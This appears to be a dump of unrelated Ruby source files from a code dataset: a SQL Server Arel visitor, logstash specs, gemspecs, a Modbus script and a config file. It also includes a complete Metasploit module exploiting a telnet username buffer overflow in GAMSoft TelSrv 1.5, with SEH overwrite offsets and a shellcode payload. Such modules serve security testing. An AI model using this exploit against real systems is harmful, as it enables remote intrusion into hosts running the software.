  elsif top_one_everything_for_through_join?(o)
    projections = projections.map { |x| projection_without_expression(x) }
  end

  [ ("SELECT" if !windowed),
    (visit(core.set_quantifier) if core.set_quantifier && !windowed),
    (visit(o.limit) if o.limit && !windowed),
    # A literal "1" projection is aliased so the rowtable has a named column.
    (projections.map{ |x| v = visit(x); v == "1" ? "1 AS [__wrp]" : v }.join(', ')),
    (source_with_lock_for_select_statement(o)),
    ("WHERE #{core.wheres.map{ |x| visit(x) }.join ' AND ' }" unless core.wheres.empty?),
    ("GROUP BY #{groups.map { |x| visit(x) }.join ', ' }" unless groups.empty?),
    (visit(core.having) if core.having),
    ("ORDER BY #{orders.map{ |x| visit(x) }.join(', ')}" if !orders.empty? && !windowed)
  ].compact.join ' '
end

# OFFSET emulation: wrap the windowed SELECT in a derived table [__rnt]
# carrying a ROW_NUMBER() (or DENSE_RANK() for DISTINCT) column [__rn],
# then filter/order on that column.
def visit_Arel_Nodes_SelectStatementWithOffset(o, a)
  core = o.cores.first
  o.limit ||= Arel::Nodes::Limit.new(9223372036854775807)   # max bigint: "no limit"
  orders = rowtable_orders(o)
  [ "SELECT",
    (visit(o.limit) if o.limit && !windowed_single_distinct_select_statement?(o)),
    (rowtable_projections(o).map{ |x| visit(x) }.join(', ')),
    "FROM (",
    "SELECT #{core.set_quantifier ? 'DISTINCT DENSE_RANK()' : 'ROW_NUMBER()'} OVER (ORDER BY #{orders.map{ |x| visit(x) }.join(', ')}) AS [__rn],",
    visit_Arel_Nodes_SelectStatementWithOutOffset(o, a, true),
    ") AS [__rnt]",
    (visit(o.offset) if o.offset),
    "ORDER BY [__rnt].[__rn] ASC"
  ].compact.join ' '
end

# COUNT with LIMIT/OFFSET: count rows of a ROW_NUMBER()-windowed rowtable.
# The limit is widened by the offset so the window spans both.
def visit_Arel_Nodes_SelectStatementForComplexCount(o, a)
  core = o.cores.first
  o.limit.expr = Arel.sql("#{o.limit.expr} + #{o.offset ? o.offset.expr : 0}") if o.limit
  orders = rowtable_orders(o)
  [ "SELECT COUNT([count]) AS [count_id]",
    "FROM (",
    "SELECT",
    (visit(o.limit) if o.limit),
    "ROW_NUMBER() OVER (ORDER BY #{orders.map{ |x| visit(x) }.join(', ')}) AS [__rn],",
    "1 AS [count]",
    (source_with_lock_for_select_statement(o)),
    ("WHERE #{core.wheres.map{ |x| visit(x) }.join ' AND ' }" unless core.wheres.empty?),
    ("GROUP BY #{core.groups.map { |x| visit x }.join ', ' }" unless core.groups.empty?),
    (visit(core.having) if core.having),
    ("ORDER BY #{o.orders.map{ |x| visit(x) }.join(', ')}" if !o.orders.empty?),
    ") AS [__rnt]",
    (visit(o.offset) if o.offset)
  ].compact.join ' '
end
# SQLServer Helpers

# Renders the FROM clause, splicing the lock hint (if any) directly after
# the first table name so the hint applies to that table.
def source_with_lock_for_select_statement(o)
  core = o.cores.first
  source = "FROM #{visit(core.source).strip}" if core.source
  if source && o.lock
    lock = visit o.lock
    # mb_chars.length keeps the insert position correct for multibyte names.
    index = source.match(/FROM [\w\[\]\.]+/)[0].mb_chars.length
    source.insert index, " #{lock}"
  else
    source
  end
end

# Best-effort resolution of the statement's primary table: unwraps SQL
# literals into Arel::Table and walks join trees down their left side.
# The commented block documents the intended ARel 2.2 migration.
def table_from_select_statement(o)
  core = o.cores.first
  # TODO: [ARel 2.2] Use #from/#source vs. #froms
  # if Arel::Table === core.from
  #   core.from
  # elsif Arel::Nodes::SqlLiteral === core.from
  #   Arel::Table.new(core.from, @engine)
  # elsif Arel::Nodes::JoinSource === core.source
  #   Arel::Nodes::SqlLiteral === core.source.left ? Arel::Table.new(core.source.left, @engine) : core.source.left
  # end
  table_finder = lambda { |x|
    case x
    when Arel::Table
      x
    when Arel::Nodes::SqlLiteral
      Arel::Table.new(x, @engine)
    when Arel::Nodes::Join
      table_finder.call(x.left)   # recurse down the left side of joins
    end
  }
  table_finder.call(core.froms)
end
# True when the statement has exactly one projection and it is DISTINCT
# (either a distinct node or raw SQL containing 'DISTINCT').
def single_distinct_select_statement?(o)
  projections = o.cores.first.projections
  p1 = projections.first
  projections.size == 1 &&
    ((p1.respond_to?(:distinct) && p1.distinct) ||
      p1.respond_to?(:include?) && p1.include?('DISTINCT'))
end

# Single DISTINCT projection combined with LIMIT + OFFSET (windowed form).
def windowed_single_distinct_select_statement?(o)
  o.limit && o.offset && single_distinct_select_statement?(o)
end

# Single DISTINCT projection of the "table.*" form.
# NOTE(review): #ends_with? is the ActiveSupport spelling (core Ruby is
# #end_with?) — this file presumably always loads alongside ActiveSupport.
def single_distinct_select_everything_statement?(o)
  single_distinct_select_statement?(o) && visit(o.cores.first.projections.first).ends_with?(".*")
end

# DISTINCT table.* with a LIMIT but no OFFSET, in a joined query.
def top_one_everything_for_through_join?(o)
  single_distinct_select_everything_statement?(o) &&
    (o.limit && !o.offset) &&
    join_in_select_statement?(o)
end

# True when every rendered projection fragment carries an ' AS ' alias.
def all_projections_aliased_in_select_statement?(o)
  projections = o.cores.first.projections
  projections.all? do |x|
    visit(x).split(',').all? { |y| y.include?(' AS ') }
  end
end

# True when any projection is an aggregate/function node.
def function_select_statement?(o)
  core = o.cores.first
  core.projections.any? { |x| Arel::Nodes::Function === x }
end

# DISTINCT + LIMIT (no OFFSET, no GROUP BY) that is not "table.*" —
# handled via the GROUP BY emulation in the non-offset builder.
def eager_limiting_select_statement?(o)
  core = o.cores.first
  single_distinct_select_statement?(o) &&
    (o.limit && !o.offset) &&
    core.groups.empty? &&
    !single_distinct_select_everything_statement?(o)
end

def join_in_select_statement?(o)
  core = o.cores.first
  core.source.right.any? { |x| Arel::Nodes::Join === x }
end

# A lone COUNT projection with a LIMIT and no joins needs the special
# COUNT-over-rowtable SQL (see visit_Arel_Nodes_SelectStatementForComplexCount).
def complex_count_sql?(o)
  core = o.cores.first
  core.projections.size == 1 &&
    Arel::Nodes::Count === core.projections.first &&
    o.limit &&
    !join_in_select_statement?(o)
end

# True when the only projection is the source table's primary key column.
def select_primary_key_sql?(o)
  core = o.cores.first
  return false if core.projections.size != 1
  p = core.projections.first
  t = table_from_select_statement(o)
  Arel::Attributes::Attribute === p && t.primary_key && t.primary_key.name == p.name
end
# Fixes up a FROM clause that is a StringJoin of an Arel OuterJoin and a
# literal "JOIN ... ON ..." SQL fragment referencing the SAME table: both
# sides using one table name would be ambiguous, so the literal fragment is
# re-aliased to "<table>_crltd".
# NOTE(review): mutates the SqlLiteral join fragment in place.
def find_and_fix_uncorrelated_joins_in_select_statement(o)
  core = o.cores.first
  # TODO: [ARel 2.2] Use #from/#source vs. #froms
  # return if !join_in_select_statement?(o) || core.source.right.size != 2
  # j1 = core.source.right.first
  # j2 = core.source.right.second
  # return unless Arel::Nodes::OuterJoin === j1 && Arel::Nodes::StringJoin === j2
  # j1_tn = j1.left.name
  # j2_tn = j2.left.match(/JOIN \[(.*)\].*ON/).try(:[],1)
  # return unless j1_tn == j2_tn
  # crltd_tn = "#{j1_tn}_crltd"
  # j1.left.table_alias = crltd_tn
  # j1.right.expr.left.relation.table_alias = crltd_tn
  return if !join_in_select_statement?(o) || !(Arel::Nodes::StringJoin === core.froms)
  j1 = core.froms.left
  j2 = core.froms.right
  return unless Arel::Nodes::OuterJoin === j1 && Arel::Nodes::SqlLiteral === j2 && j2.include?('JOIN ')
  # Only act when both joins target the same table name.
  j1_tn = j1.right.name
  j2_tn = j2.match(/JOIN \[(.*)\].*ON/).try(:[],1)
  return unless j1_tn == j2_tn
  # Insert the alias before the ON clause and repoint column references.
  on_index = j2.index(' ON ')
  j2.insert on_index, " AS [#{j2_tn}_crltd]"
  j2.sub! "[#{j2_tn}].", "[#{j2_tn}_crltd]."
end
# Builds the projection list for the "[__rnt]" (row-number table) subquery
# used to emulate LIMIT/OFFSET on SQL Server. Column references are
# re-pointed from the real table name to the [__rnt] alias, while
# DISTINCT/TOP fragments are stripped or injected depending on statement
# shape. Projections are dup'ed before the destructive String ops, so the
# original AST is left untouched.
def rowtable_projections(o)
  core = o.cores.first
  if windowed_single_distinct_select_statement?(o) && core.groups.blank?
    # DISTINCT with limit AND offset: drop DISTINCT, prepend TOP(n).
    tn = table_from_select_statement(o).name
    core.projections.map do |x|
      x.dup.tap do |p|
        p.sub! 'DISTINCT', ''
        p.insert 0, visit(o.limit) if o.limit
        p.gsub! /\[?#{tn}\]?\./, '[__rnt].'
        p.strip!
      end
    end
  elsif single_distinct_select_statement?(o)
    # DISTINCT without a window: keep DISTINCT, fold TOP(n) in after it.
    tn = table_from_select_statement(o).name
    core.projections.map do |x|
      x.dup.tap do |p|
        p.sub! 'DISTINCT', "DISTINCT #{visit(o.limit)}".strip if o.limit
        p.gsub! /\[?#{tn}\]?\./, '[__rnt].'
        p.strip!
      end
    end
  elsif join_in_select_statement?(o) && all_projections_aliased_in_select_statement?(o)
    # Joined, fully-aliased projections: select just the aliases.
    core.projections.map do |x|
      Arel.sql visit(x).split(',').map{ |y| y.split(' AS ').last.strip }.join(', ')
    end
  elsif select_primary_key_sql?(o)
    [Arel.sql("[__rnt].#{quote_column_name(core.projections.first.name)}")]
  else
    [Arel.sql('[__rnt].*')]
  end
end
# Orders used inside the row-number-table rewrite. Uses the statement's
# explicit ORDER BY clauses when present; otherwise falls back to a
# deterministic ascending order on the primary key (or the first column).
# Fix: removed the unused local `core = o.cores.first`.
def rowtable_orders(o)
  orders =
    if o.orders.empty?
      table = table_from_select_statement(o)
      column = table.primary_key || table.columns.first
      [column.asc]
    else
      o.orders
    end
  orders.uniq
end
# TODO: We use this for grouping too, maybe make Grouping objects vs SqlLiteral.
# Strips aggregate wrappers (COUNT/SUM/MAX/MIN/AVG), leading DISTINCT and
# TOP(n) markers from each comma-separated projection fragment, returning
# the bare expressions as one SqlLiteral. The bang methods mutate only the
# fragment strings produced by split, never the source projection.
def projection_without_expression(projection)
  Arel.sql(visit(projection).split(',').map do |x|
    x.strip!
    x.sub!(/^(COUNT|SUM|MAX|MIN|AVG)\s*(\((.*)\))?/,'\3')
    x.sub!(/^DISTINCT\s*/,'')
    x.sub!(/TOP\s*\(\d+\)\s*/i,'')
    x.strip
  end.join(', '))
end
end
end
end
Arel::Visitors::VISITORS['sqlserver'] = Arel::Visitors::SQLServer
| 36.232416 | 155 | 0.575456 |
1dbdcf65a92982d393807ff14b8b9162465732d4 | 94 | # frozen_string_literal: true
module RuboCop
  module Expert
    # Gem release version for rubocop-expert; bump on each release.
    VERSION = '0.1.2'
  end
end
| 11.75 | 29 | 0.702128 |
e86e25aed37e0bc14ccac48f2545716a11f83e77 | 6,290 | # encoding: utf-8
require "test_utils"
require "logstash/util/accessors"
describe LogStash::Util::Accessors, :if => true do
context "using simple field" do
  # Simple (non-bracketed) field references: the key string is used
  # verbatim, including keys with spaces and numeric-looking strings.

  it "should get value of word key" do
    str = "hello"
    data = { "hello" => "world" }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == data[str]
  end

  it "should get value of key with spaces" do
    str = "hel lo"
    data = { "hel lo" => "world" }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == data[str]
  end

  it "should get value of numeric key string" do
    str = "1"
    data = { "1" => "world" }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == data[str]
  end

  it "should handle delete" do
    str = "simple"
    data = { "simple" => "things" }
    accessors = LogStash::Util::Accessors.new(data)
    # del returns the removed value and mutates the backing hash.
    insist { accessors.del(str) } == "things"
    insist { data }.empty?
  end

  it "should set string value" do
    str = "simple"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.set(str, "things") } == "things"
    insist { data } == { "simple" => "things" }
  end

  it "should set array value" do
    str = "simple"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.set(str, ["foo", "bar"]) } == ["foo", "bar"]
    insist { data } == { "simple" => ["foo", "bar"]}
  end
end
context "using field path" do
  # Bracketed field references ([a][b]...) walk nested hashes/arrays.
  # Fix: the "should get deep string value" example was duplicated
  # verbatim; one copy removed.

  it "should get shallow string value of word key" do
    str = "[hello]"
    data = { "hello" => "world" }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == "world"
  end

  it "should get shallow string value of key with spaces" do
    str = "[hel lo]"
    data = { "hel lo" => "world" }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == "world"
  end

  it "should get shallow string value of numeric key string" do
    str = "[1]"
    data = { "1" => "world" }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == "world"
  end

  it "should get deep string value" do
    str = "[hello][world]"
    data = { "hello" => { "world" => "foo", "bar" => "baz" } }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get(str) } == data["hello"]["world"]
  end

  it "should handle delete" do
    str = "[hello][world]"
    data = { "hello" => { "world" => "foo", "bar" => "baz" } }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.del(str) } == "foo"

    # Make sure the "world" key is removed.
    insist { data["hello"] } == { "bar" => "baz" }
  end

  it "should set shallow string value" do
    str = "[hello]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.set(str, "foo") } == "foo"
    insist { data } == { "hello" => "foo" }
  end

  it "should strict_set shallow string value" do
    str = "[hello]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.strict_set(str, "foo") } == "foo"
    insist { data } == { "hello" => "foo" }
  end

  it "should set deep string value" do
    str = "[hello][world]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.set(str, "foo") } == "foo"
    insist { data } == { "hello" => { "world" => "foo" } }
  end

  it "should set deep array value" do
    str = "[hello][world]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.set(str, ["foo", "bar"]) } == ["foo", "bar"]
    insist { data } == { "hello" => { "world" => ["foo", "bar"] } }
  end

  it "should strict_set deep array value" do
    str = "[hello][world]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.strict_set(str, ["foo", "bar"]) } == ["foo", "bar"]
    insist { data } == { "hello" => { "world" => ["foo", "bar"] } }
  end

  it "should retrieve array item" do
    data = { "hello" => { "world" => ["a", "b"], "bar" => "baz" } }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get("[hello][world][0]") } == data["hello"]["world"][0]
    insist { accessors.get("[hello][world][1]") } == data["hello"]["world"][1]
  end

  it "should retrieve array item containing hash" do
    data = { "hello" => { "world" => [ { "a" => 123 }, { "b" => 345 } ], "bar" => "baz" } }
    accessors = LogStash::Util::Accessors.new(data)
    insist { accessors.get("[hello][world][0][a]") } == data["hello"]["world"][0]["a"]
    insist { accessors.get("[hello][world][1][b]") } == data["hello"]["world"][1]["b"]
  end
end
context "using invalid encoding" do
  # strict_set must reject values that are not valid UTF-8.
  # Fix: corrected the "strinct_set" typo in the four example descriptions.

  it "strict_set should raise on non UTF-8 string encoding" do
    str = "[hello]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    expect { accessors.strict_set(str, "foo".encode("US-ASCII")) }.to raise_error
  end

  it "strict_set should raise on non UTF-8 string encoding in array" do
    str = "[hello]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    expect { accessors.strict_set(str, ["foo", "bar".encode("US-ASCII")]) }.to raise_error
  end

  it "strict_set should raise on invalid UTF-8 string encoding" do
    str = "[hello]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    expect { accessors.strict_set(str, "foo \xED\xB9\x81\xC3") }.to raise_error
  end

  it "strict_set should raise on invalid UTF-8 string encoding in array" do
    str = "[hello]"
    data = {}
    accessors = LogStash::Util::Accessors.new(data)
    expect { accessors.strict_set(str, ["foo", "bar \xED\xB9\x81\xC3"]) }.to raise_error
  end
end
end
| 33.457447 | 93 | 0.558665 |
ab8e675b36365fe65068b00384d69e624d5119fd | 867 | # frozen_string_literal: true
module Facts
  module Aix
    # Resolves the AIX `disks` fact plus its legacy aliases
    # (`blockdevices` and per-disk `blockdevice_<name>_size`).
    class Disks
      FACT_NAME = 'disks'
      ALIASES = %w[blockdevices blockdevice_.*_size].freeze

      # Returns the resolved fact list, or a single nil-valued fact when
      # the resolver reports no disks.
      def call_the_resolver
        disks = Facter::Resolvers::Aix::Disks.resolve(:disks)
        return Facter::ResolvedFact.new(FACT_NAME, nil) if disks.nil? || disks.empty?

        resolved = [
          Facter::ResolvedFact.new(FACT_NAME, disks),
          Facter::ResolvedFact.new('blockdevices', disks.keys.join(','), :legacy)
        ]
        disks.each do |disk_name, disk_info|
          resolved << Facter::ResolvedFact.new("blockdevice_#{disk_name}_size", disk_info[:size_bytes], :legacy)
        end
        resolved
      end
    end
  end
end
| 26.272727 | 112 | 0.645905 |
bb55f5945b4bcf8b86175348003dea90e38a6063 | 1,046 | module Puppet::Module::Tool
class Dependency

  # Instantiates a new module dependency with a +full_module_name+ (e.g.
  # "myuser-mymodule"), and optional +version_requirement+ (e.g. "0.0.1") and
  # optional repository (a URL string).
  def initialize(full_module_name, version_requirement = nil, repository = nil)
    @full_module_name = full_module_name
    # TODO: add error checking, the next line raises ArgumentError when +full_module_name+ is invalid
    @username, @name = Puppet::Module::Tool.username_and_modname_from(full_module_name)
    @version_requirement = version_requirement
    @repository = repository ? Repository.new(repository) : nil
  end

  # Return PSON representation of this data. Optional fields are emitted
  # only when present. (The original `@x && !@x.nil?` guards were
  # redundant — truthiness already excludes nil.)
  def to_pson(*args)
    result = { :name => @full_module_name }
    result[:version_requirement] = @version_requirement if @version_requirement
    result[:repository] = @repository.to_s if @repository
    result.to_pson(*args)
  end
end
end
| 41.84 | 112 | 0.712237 |
d530cb59b97f8e5f4c011da090960d7303501929 | 597 | require File.expand_path("#{File.dirname(__FILE__)}/../../../test_helper")
class Piston::Git::TestGitWorkingCopyRememberance < Piston::TestCase
  # Verifies that WorkingCopy#remember persists handler values into a
  # .piston.yml file inside the working-copy directory.

  def setup
    super
    @wcdir = mkpath("tmp/wc")
    @wc = Piston::Git::WorkingCopy.new(@wcdir)
  end

  def test_creates_dot_piston_dot_yml_file
    @wc.remember({}, "a" => "b")
    assert((@wcdir + ".piston.yml").exist?)
  end

  def test_writes_values_as_yaml_under_handler_key
    expected = {"a" => "b"}
    @wc.remember({}, expected)
    # The second remember argument lands under the "handler" YAML key.
    actual = YAML.load((@wcdir + ".piston.yml").read)
    assert_equal expected, actual["handler"]
  end
end
| 27.136364 | 74 | 0.664992 |
acc638d8015439f5e295917a74b8a810924699d8 | 3,423 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
# Remote SEH-overwrite exploit for GAMSoft TelSrv 1.5 (CVE-2000-0665): a
# sprintf stack overflow in the telnet username field. The service dies
# after one attempt, so there is a single shot per host.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
      'Description'    => %q{
          This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.
        Other versions may also be affected. The service terminates after exploitation,
        so you only get one chance!
      },
      'Author'         => [ 'patrick' ],
      'Arch'           => [ ARCH_X86 ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2000-0665'],
          [ 'BID', '1478'],
          [ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'           => 1000,
          'BadChars'        => "\x00\x0a",
          'StackAdjustment' => -3500,
        },
      'Platform'       => ['win'],
      # Per-target SEH return address (pop/pop/ret) and username offset.
      'Targets'        =>
        [
          [ 'Windows 2000 Pro SP0/4 English REMOTE',
            {
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
              'Offset' => 1886,
            }
          ],
          [ 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
            {
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
              'Offset' => 3318,
            }
          ],
          [ 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
            {
              'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
              'Offset' => 3358,
            }
          ],
=begin
          [ 'Windows XP Pro SP0/1 English',
            {
              'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL
              'Offset' => 2600, # this is made up and absolutely wrong ;-)
            }
          ],
=end
        ],
      'DisclosureDate' => 'Jul 17 2000',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(23),
      ], self.class)
  end

  # Banner-grabs the telnet service (after the unregistered-version delay)
  # and flags hosts announcing TelSrv 1.5 as likely vulnerable.
  def check
    connect
    print_status("Attempting to determine if target is possibly vulnerable...")
    select(nil,nil,nil,7)
    banner = sock.get_once || ''
    vprint_status("Banner: #{banner}")
    if banner.to_s =~ /TelSrv 1\.5/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  # Sends an oversized username with the SEH payload placed at the
  # target-specific offset. No retry: the service terminates afterwards.
  def exploit
    print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")

    connect

    print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
    select(nil,nil,nil,7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.

    username = rand_text_english(20000, payload_badchars)
    seh = generate_seh_payload(target.ret)
    username[target['Offset'], seh.length] = seh

    print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
    sock.put(username)
    select(nil,nil,nil,0.25)
    print_status('Exploit sent...')

    handler
    disconnect
  end
end
| 30.026316 | 114 | 0.553608 |
39fba1b0a3c9586d2c30e788bf5c5c02940b1241 | 1,267 | require_relative 'lib/qbittorrent/version'
# Gem specification for the qbittorrent WEB API client.
Gem::Specification.new do |spec|
  spec.name = 'qbittorrent'
  spec.version = QBittorrent::VERSION
  spec.authors = ['Roy Zheng']
  spec.email = ['[email protected]']

  spec.summary = 'QBittorrent WEB API Client.'
  spec.description = 'QBittorrent WEB API Client.only support qBittorrent v4.1+.'
  spec.homepage = 'https://github.com/royzheng/qbittorrent'
  spec.license = 'MIT'
  spec.required_ruby_version = Gem::Requirement.new('>= 2.3.0')

  spec.metadata['homepage_uri'] = spec.homepage
  spec.metadata['source_code_uri'] = 'https://github.com/royzheng/qbittorrent'
  spec.metadata['changelog_uri'] = 'https://github.com/royzheng/qbittorrent'

  # Specify which files should be added to the gem when it is released.
  # The `git ls-files -z` loads the files in the RubyGem that have been added into git.
  spec.files = Dir.chdir(File.expand_path(__dir__)) do
    `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
  end
  spec.bindir = 'exe'
  spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
  spec.require_paths = ['lib']

  # Runtime dependencies.
  spec.add_dependency 'http', '~> 4.4.1'
  spec.add_dependency 'logger', '~> 1.4'
end
| 40.870968 | 87 | 0.667719 |
034809962d4708c3ad10c595ace3587cef6bc086 | 1,774 | #!/usr/bin/ruby
require "awesome_print"
require "optparse"
require "pp"
require "socket"
ap "This is ruby program about modbus"

options = {}
OptionParser.new do |opts|
  # Help banner shown for -h/--help.
  opts.banner = 'here is help messages of the command line tool.'

  # Boolean switch (no argument): -s / --switch flips options[:switch].
  options[:switch] = false
  opts.on('-s', '--switch', 'Set options as switch') do
    options[:switch] = true
  end

  # Flag with a single argument, parsed as a value (e.g. a name).
  opts.on('-n NAME', '--name Name', 'Pass-in single name') do |value|
    options[:name] = value
  end

  # Flag with comma-separated arguments, parsed into an Array.
  opts.on('-a A,B', '--array A,B', Array, 'List of arguments') do |value|
    options[:array] = value
  end

  # TCP port the server below listens on.
  opts.on('-p Port', '--port Port', 'listen port') do |value|
    options[:port] = value
  end
end.parse!

# Default listen port, overridden by -p. (A String port from the CLI is
# accepted by TCPServer.open.)
localport = options.fetch(:port, 5555)
puts "listen port #{localport}"

server = TCPServer.open(localport)
loop {
  Thread.start(server.accept) do |client|
    loop {
      # Modbus-TCP request frame: MBAP header (transaction id 0x1501,
      # protocol 0, length 6, unit 1) followed by PDU: function 0x03
      # "read holding registers", start address 0, quantity 0x40.
      head = [0x15, 0x01, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x00, 0x00, 0x40]
      re = head.pack("C*")
      puts "send>"
      ap re
      ap re.class
      ap re.length
      client.write(re)

      # Read one response chunk. The original used client.read(), which
      # blocks until the peer closes the connection and stalled this loop;
      # readpartial returns as soon as data is available.
      begin
        receive = client.readpartial(4096)
      rescue EOFError
        break # peer closed the connection
      end
      puts "receive>"
      ap receive
      ap receive.class   # was `ap re.class` — copy-paste bug
      ap receive.length
      ap receive.unpack("H*")
      ap receive.unpack("h*")
      sleep(20)
    }
  end
}
| 22.74359 | 80 | 0.600902 |
6a31fe8b9eb528b6a41cfda1e104ff0d504580ac | 1,338 | # frozen_string_literal: true
$LOAD_PATH.push File.expand_path("../lib", __FILE__)
require "simplecov/version"
# Gem specification for simplecov.
Gem::Specification.new do |gem|
  gem.name = "simplecov"
  gem.version = SimpleCov::VERSION
  gem.platform = Gem::Platform::RUBY
  gem.authors = ["Christoph Olszowka"]
  gem.email = ["christoph at olszowka de"]
  gem.homepage = "http://github.com/colszowka/simplecov"
  gem.description = %(Code coverage for Ruby with a powerful configuration library and automatic merging of coverage across test suites)
  gem.summary = gem.description
  gem.license = "MIT"

  gem.required_ruby_version = ">= 2.4.0"

  # Runtime dependencies.
  gem.add_dependency "simplecov-html", "~> 0.10.0"
  gem.add_dependency "docile", "~> 1.1"

  # Development-only dependencies: build, test frameworks, browser drivers
  # for the cucumber suite, and linting.
  gem.add_development_dependency "bundler"
  gem.add_development_dependency "rake", "~> 12.0"
  gem.add_development_dependency "rspec", "~> 3.2"
  gem.add_development_dependency "test-unit"
  gem.add_development_dependency "cucumber"
  gem.add_development_dependency "aruba", "~> 0.14"
  gem.add_development_dependency "capybara", "< 3"
  gem.add_development_dependency "phantomjs"
  gem.add_development_dependency "poltergeist"
  gem.add_development_dependency "rubocop", "0.49.1"

  gem.files = Dir["{lib}/**/*.*", "bin/*", "LICENSE", "*.md", "doc/*"]
  gem.require_paths = ["lib"]
end
| 37.166667 | 136 | 0.700299 |
ed54970b3e5a5b6aeee3f9362f631c0ecf1d6032 | 13,720 | # This is a configuration file for octocatalog-diff (https://github.com/github/octocatalog-diff).
#
# When octocatalog-diff runs, it will look for configuration files in the following locations:
# - As specified by the environment variable OCTOCATALOG_DIFF_CONFIG_FILE
# - Your current working directory: `$PWD/.octocatalog-diff.cfg.rb`
# - Your home directory: `$HOME/.octocatalog-diff.cfg.rb`
# - The Puppet configuration directory: `/opt/puppetlabs/octocatalog-diff/octocatalog-diff.cfg.rb`
# - The local system directory: `/usr/local/etc/octocatalog-diff.cfg.rb`
# - The system directory: `/etc/octocatalog-diff.cfg.rb`
#
# It will use the first configuration file it finds in the above locations. If it does not find any
# configuration files, a default configuration will be used.
#
# To test this configuration file, place it in one of the above locations and run:
# octocatalog-diff --config-test
module OctocatalogDiff
  # Configuration class. See comments for each method to define the most common parameters.
  class Config
    ################################################################################################
    # Configure your settings in this method!
    # This method (self.config) must exist, and must return a hash.
    ################################################################################################

    def self.config
      settings = {}

      ##############################################################################################
      # hiera_config
      #   Path to the hiera.yaml configuration file. If the path starts with a `/`, then it is
      #   treated as an absolute path on this system. Otherwise, the path will be treated as
      #   a relative path. If you don't specify this, the tool will assume you aren't using Hiera.
      #   More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-hiera.md
      ##############################################################################################

      # settings[:hiera_config] = '/etc/puppetlabs/puppet/hiera.yaml' # Absolute path
      settings[:hiera_config] = 'hiera.yaml' # Relative path, assumes hiera.yaml at top of repo

      ##############################################################################################
      # hiera_path
      # hiera_path_strip
      #   These control the setup of the 'datadir' when you are using the JSON or YAML data source.
      #   There are two ways to configure this setting - do one or the other but not both.
      #
      #   1. (EASIEST METHOD)
      #      You can specify the path to the hieradata relative to the checkout of your Puppet repo.
      #      This may be the most straightforward to configure. For example, if your Hiera data YAML
      #      and JSON files are found under a `hieradata` directory in the top level of your Puppet
      #      repo, simply set `settings[:hiera_path] = 'hieradata'` and you're done!
      #
      #   2. (MORE COMPLEX METHOD)
      #      You can specify a string that will be stripped off the existing defined data directory
      #      in the hiera.yaml file. For example, perhaps your hiera.yaml file contains this code:
      #        :yaml:
      #          :datadir: /etc/puppetlabs/code/environments/%{environment}/hieradata
      #      In this case, you desire to strip `/etc/puppetlabs/code` from the beginning of the path,
      #      in order that octocatalog-diff can find your hiera datafiles in the compilation
      #      location, which is {temporary directory}/environments/production/hieradata.
      #      If you use this, be sure that you do NOT include a trailing slash!
      #
      #   More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-hiera.md
      ##############################################################################################

      # This should work out-of-the-box with a default Puppet Enterprise or Puppet Control Repo setup.
      settings[:hiera_path] = 'hieradata'

      # If you want to use the 'strip' method described above, this may work.
      # settings[:hiera_path_strip] = '/etc/puppetlabs/code'

      ##############################################################################################
      # puppetdb_url
      #   URL, including protocol and port number, to your PuppetDB instance. This is used for
      #   octocatalog-diff to connect and retrieve facts (and possibly compiled catalogs).
      #   Example: https://puppetdb.yourcompany.com:8081
      #   More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-puppetdb.md
      ##############################################################################################

      # settings[:puppetdb_url] = 'https://puppetdb.yourcompany.com:8081'

